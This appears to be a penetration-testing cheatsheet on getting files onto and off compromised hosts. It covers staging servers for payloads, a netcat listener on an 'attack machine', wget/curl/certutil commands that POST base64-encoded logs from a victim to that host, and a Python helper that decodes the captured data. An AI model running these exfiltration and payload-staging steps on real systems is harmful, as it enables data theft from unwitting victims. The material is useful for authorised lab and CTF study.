Infil/Exfil notes

This is a cheatsheet of basic service setups for getting files onto and off of remote hosts.

Test servers

This is useful infra for getting payloads and tools onto remote hosts. Doubly so if you force a standard port like 80/443. Once these are up, you can usually curl/wget/iwr your payload right down.

  • Basic python server is like python3 -m http.server <port>
    • Defaults to port 8000
  • PHP's is like php -S localhost:8000
    • To serve to the rest of the network, bind to 0.0.0.0 instead of localhost. Obviously you can change the port too.

Passing PEAS logs and other files over HTTP

  • On attack machine:
    • nc -lvnp 80 > file.txt
    • nc just listens on a raw TCP socket and dumps whatever the client sends, request line and headers included, into file.txt; it never sends a response, so the curl/wget call on the victim will hang until you stop it
  • On linux vic:
    • cat log.txt | base64 > log.b64
    • wget --post-file=log.b64 http://attack.machine
  • On Windows
    • certutil -encode log.txt log.b64
    • CMD
      • curl -X POST -d @log.b64 http://attack.machine
    • Powershell
      • cmd /c 'curl -X POST -d @log.b64 http://attack.machine'
        • In PowerShell, curl is an alias for Invoke-WebRequest, so go through cmd (or call curl.exe explicitly) to get the real curl

After the curl/wget call, ctrl + c the nc process on the attack box. You should have the base64 encoded log back on the machine. To decode:

  • From Windows

    • Open in a text editor and remove the HTTP headers and certutil's -----BEGIN CERTIFICATE-----/-----END CERTIFICATE----- markers (curl's -d @file strips newlines, so the markers may sit on the same line as the base64)
    • cat log.b64 | base64 --decode > winlog.txt
    • Windows terminals (both PS and CMD) use UTF-16LE formatting while all other text on a computer is usually UTF-8, so convert it: iconv -f UTF-16LE -t UTF-8 winlog.txt > winlog_formatted.txt (if the file starts with a BOM, use -f UTF-16 so iconv consumes it instead of passing it through)
    • Now you can cat winlog_formatted.txt | less -R to read the log.
  • From Linux

    • Again, open the log in a text editor to strip the HTTP headers
    • cat log.b64 | base64 --decode > linlog.txt
    • Linux logs are already UTF-8, so you should be able to read them right away.
      • cat linlog.txt | less -R
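
Added example (not part of the original notes): a small Python script that does the manual decode steps above on the raw file nc wrote, for both the Windows and Linux flows. The captures, hostname and log lines are constructed stand-ins.

```python
import base64
import re

# certutil -encode wraps its output in these markers; curl's -d strips newlines,
# so they may sit on the same line as the base64 or on their own lines.
_MARKERS = re.compile(rb"-----(BEGIN|END) CERTIFICATE-----")


def build_capture(body: bytes) -> bytes:
    """Constructed stand-in for what `nc -lvnp 80 > file.txt` saves when a
    host POSTs `body` with curl or wget (request line, headers, blank line)."""
    return (
        b"POST / HTTP/1.1\r\nHost: attack.machine\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body
    )


def decode_capture(raw: bytes) -> str:
    """Strip the HTTP headers and certutil markers, base64-decode, then decode
    the text as UTF-16LE (Windows redirect output, BOM FF FE) or UTF-8."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:          # no headers at all, e.g. a bare log.b64 file
        body = head
    body = _MARKERS.sub(b"", body)
    body = re.sub(rb"\s+", b"", body)  # tolerate wrapped or unwrapped base64
    data = base64.b64decode(body, validate=True)
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le")
    return data.decode("utf-8")


# Windows flow: PowerShell-redirected log (UTF-16LE with BOM) -> certutil -encode
# -> `curl -X POST -d @log.b64`, which joins markers and base64 onto one line.
WIN_TEXT = "Hostname: WS01\r\nUser: corp\\alice\r\n"          # constructed
WIN_CAPTURE = build_capture(
    b"-----BEGIN CERTIFICATE-----"
    + base64.b64encode(b"\xff\xfe" + WIN_TEXT.encode("utf-16-le"))
    + b"-----END CERTIFICATE-----"
)

# Linux flow: `base64` (76-column wrapped) -> `wget --post-file`, sent verbatim.
LIN_TEXT = "[+] Sudo version 1.9.5p2\n"                        # constructed
LIN_CAPTURE = build_capture(base64.encodebytes(LIN_TEXT.encode("utf-8")))

if __name__ == "__main__":
    print(decode_capture(WIN_CAPTURE), end="")
    print(decode_capture(LIN_CAPTURE), end="")
```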

Misc

  • SCP
    • scp file user@host:filepath
  • N.b. evil-winrm has built-in upload/download features.